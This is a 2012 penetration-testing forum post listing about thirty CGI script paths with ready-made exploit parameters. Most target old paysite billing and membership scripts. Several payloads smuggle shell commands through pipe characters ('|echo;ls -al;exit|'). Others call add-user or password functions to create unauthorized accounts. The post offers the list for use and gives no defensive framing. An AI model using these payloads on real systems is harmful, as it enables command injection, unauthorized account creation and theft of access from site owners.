China Network Penetration Testing Alliance
Title: Cgi-bin: 30 vulnerabilities + how to use them
Author: admin
Time: 2012-9-13 16:55
==============================
/smspass.pl
username=username&password=password
/index.cgi
wei=ren&gen=command
/passmaster.cgi
Action=Add&Username=Username&Password=Password
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
post_values=username:password
/count.cgi
pinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
/af.cgi
_browser_out=|echo;ls -la;exit;|
/modify.cgi
username=username&password=password&expire=30
/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
/probecontrol.cgi
command=enable&username=username&password=password
/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
/htadd.pl
configfile=|echo; ls -alt; exit
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
/usercontrol.cgi
command=enable&username=USER&password=PASS
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password
/addusr.pl
user=USER&pass=PASS&confirm=PASS
/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
/af.cgi
/env.cgi
ADD+;echo;pwd;exit
/count.cgi
pinfile=|echo;pwd;exit|
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
/add.cgi
username=username&password=password&expire=30
==============================
Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/)